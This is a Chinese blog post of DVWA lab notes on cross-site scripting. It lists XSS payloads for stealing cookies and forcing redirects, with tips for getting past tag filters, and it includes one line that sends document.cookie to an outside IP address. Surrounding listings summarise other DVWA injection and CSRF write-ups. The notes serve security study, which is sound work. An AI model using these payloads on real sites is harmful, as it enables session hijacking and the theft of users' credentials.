dvwa学习笔记1

已于 2022-03-01 17:36:26 修改
阅读量278 收藏
点赞数
分类专栏: 笔记 文章标签: 测试
于 2022-03-01 14:20:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41555580/article/details/123205011
版权

取cookie:

适合场景 有输入框并echo输入值

对方过滤的手段包括replace你的标签,用正则直接过滤标签,可尝试拼接标签和换标签

1.<script>alert(document.cookie)</script>

2.<body οnlοad=alert(document.cookie)>

3.<a href='' οnclick=alert(document.cookie)>click1</a>   

4.<img src=http://192.168.10.128/a.jpg οnerrοr=alert(document.cookie)> 给个错误地址,利用报错输出cookie

<script>new Image().src="http://192.168.10.141/a.php?output="+document.cookie;</script>

注意:参数如果进行html实体转义,就无法利用XSS漏洞了

如上面的htmlspecialchars函数直接将参数变成html实体,xss失效

重定向:

1.<script>window.location='http://www.163.com'</script>

2.<iframe src='http://www.163.com' height='1000' width='1500'><iframe>

3.<body οnlοad=window.location='http://www.163.com'>

4.<a href='http://www.163.com'>click1</a>   

5.<img src=http://192.168.10.128/a.jpg οnerrοr=window.location='http://www.163.com'>  

DVWA-XSS学习笔记 - 雨中落叶 - 博客园

microsoft chatgpt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA全系列笔记
BROTHERYY的博客
08-21 5165
文章目录一、DVWA的安装二、漏洞学习2.1 Brute Force2.1.1 Brute Force(low)2.1.2 Brute Force(Medium)2.1.3 Brute Force(High)2.2 Command Injection(命令注入)2.2.1 Command Injection(Low)2.2.2 Command Injection(Medium)2.2.3 Command Injection(High)2.3 Csrf(跨站请求伪造)2.3.1 Csrf(Low)2.3.2
Dvwa之SQL 注入全级别学习笔记
Mbys_Lettuce的博客
09-15 1034
​ SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同的SQL语句,这是学习dvwa的sql注入的相关笔记。仅供学习。 ​
DVWA笔记
陌茗228.的博客
04-11 134
DVWA Brute Force(暴力破解) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAPTCHA (不安全的验证码) SQL Injection(SQL注入) SQL Injection(Blind)(SQL盲注) XSS (DOM) XSS(Reflected)(反射型跨站脚本) XSS(Stored)(存储型跨站脚本) Weak Session IDs (弱会话)
DVWA学习笔记
lee_maple的博客
01-15 3077
DVWA学习笔记 Security Level: LOW 暴力破解(Brute Force) 已知用户名,尝试使用burp爆破密码 随意输入一个密码,将其发送至burpsuit intruder 导入一个字典(在实际生产中需要强大的社会工程学字典)进行暴力破解 一般情况下,不难看出长度不同的即为正确密码 命令注入(Command Injection) Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。P..
DVWA学习笔记(自用)
a_qiao_的博客
08-21 253
DVWA学习笔记(自用) XSS(reflected) LOW 此处因为标签没有被过滤,所以此处被当作script语言被执行了 在不看源码的情况下,先尝试普通字符 观察源码处,字符被显示出来了 再输入标签,看标签是否被过滤 观察源码可以发现,button标签未被过滤,所以找到了漏洞 Medium <Script>alert(123456)</script> 混淆或大小写绕过 high <img src="" οnerrοr="alert('XSS')">
DVWA学习笔记全等级
06-08
DVWA学习笔记全等级
sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 567
目录一、sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
Dvwa之SQL盲注全级别学习笔记
Mbys_Lettuce的博客
09-19 1324
注入的同时观察页面返回信息,输入1' and (length(database()))=猜测的数据库长度,返回信息为User ID exists in the database则证明该数据库长度为猜测的长度。可以看到,Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti。因为有两个数值,且ASCII中97到122为小写字母的范围,所以把x的范围为1~4,y的范围为97~122。
Dvwa之CSRF全级别学习笔记
Mbys_Lettuce的博客
09-27 292
CSRF,全称Cross-site request forgery,就是跨站请求伪造,指利用受害者尚未失效的身份认证信息,诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向服务器发送请求,从而完成非法操作(如转账、改密等)。本次直接使用low级别的还能攻击成功的原因是,我将恶意网站放在了该网站的服务器里,导致被攻击者访问时点击进入恶意网站,发出修改指令的文件头还是这个主机,所以才能试验成功,通常情况下可以通过上传漏洞将文件传入被攻击者网页中。本文为学习笔记,仅供学习
DVWA通关笔记
m0_52450604的博客
02-01 193
DVWA通关笔记(一) SQL Injection
DVWA靶场(通关笔记
博客
04-25 1808
Brute Force(暴力破解) Command Injection(命令注入) low: Medium: High: CSRF(跨站请求伪造漏洞) File Inclusion(文件包含漏洞) File upload(文件上传漏洞) SQL Injection(SQL注入) union联合查询 报错注入 时间盲注 SQL Injection (Blind)(SQL盲注) 布尔盲注 时间盲注 XSS( Reflected)(xss反射型) XSS(Stored)(x...
Dvwa漏洞学习笔记(low)
最新发布
2301_80366980的博客
01-21 959
记录low难度的dvwa基础漏洞仅供个人学习,如有冒犯请尽快联系。
SQL注入入门学习笔记DVWA-SQL注入之布尔盲注
2301_78774803的博客
11-02 153
输入1' and ( select ascii( mid( column_name,1,1 )) from information_schema.columns where table_name = 'users' and table_schema = 'dvwa' limit 3,1) > 96#输入1' and ( select ascii( mid( schema_name,1,1 )) from information_schema.schemata limit 1,1 ) = 101#
DVWAXSS
qq_39670065的博客
08-08 358
Reflected Cross Site Scripting (XSS) low 直接尝试<script>alert('xss')</script> 弹窗成功 medium 还是先尝试<script>alert('xss')</script> 发现并没有弹窗但页面显示了Hello alert('xss') 猜测是<script>被删除 看波源码 <?php header ("X-XSS-Protection: 0"); // Is th
DVWA 通关笔记:JavaScript Attacks
Sheng_GuoFu的博客
01-11 2102
什么是JavaScript Attack?JavaScript Attack即JS攻击, 攻击者可以利用JavaScript实施攻击。
DVWA XSS
部分学习记录
09-19 229
DOM Based Cross Site Scripting (XSS) low 打开是一个菜单选项,提交以后发现URL有参数,修改一下呢?成功了,那直接试一下xss脚本<script>alert(document.cookie);</script>,成功获取到cookie medium 构造代码<script>alert(document.cookie)</script>,没效果?应该是有过滤机制,试一下双写,还是不行,会不会是转义问题?直接利用URL编码
xss漏洞-DVWA跨站攻击盗取用户cookie值
CKT_GOD的博客
09-18 3564
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
DVWA靶场分析笔记
RestoreJustice的博客
03-16 878
用户登录后,在服务器就会创建一个会话(session),叫做会话控制,接着访问页面的时候就不用登录,只需要携带Sesion去访问,是用户的身份令牌。sessionID作为特定用户访问站点所需要的唯一内容。如果能够计算或轻易猜到该sessionID,则攻击者将可以轻易获取访问限,无需录直接进入特定用户界面,进而进行其他操作。用户访问服务器的时候,在服务器端会创建一个新的会话(Session),会话中会保存用户的状态和相关信息,用于标识用户。
DVWA渗透演练系统入门指南
"Web安全之DVWA入门,适合小白学习的渗透测试入门书籍,详细介绍了DVWA这个渗透演练系统,以及Web安全基础知识和OWASP Top 10漏洞" 本资源是一本针对Web安全入门的电子书,特别关注DVWA(Damn Vulnerable Web ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值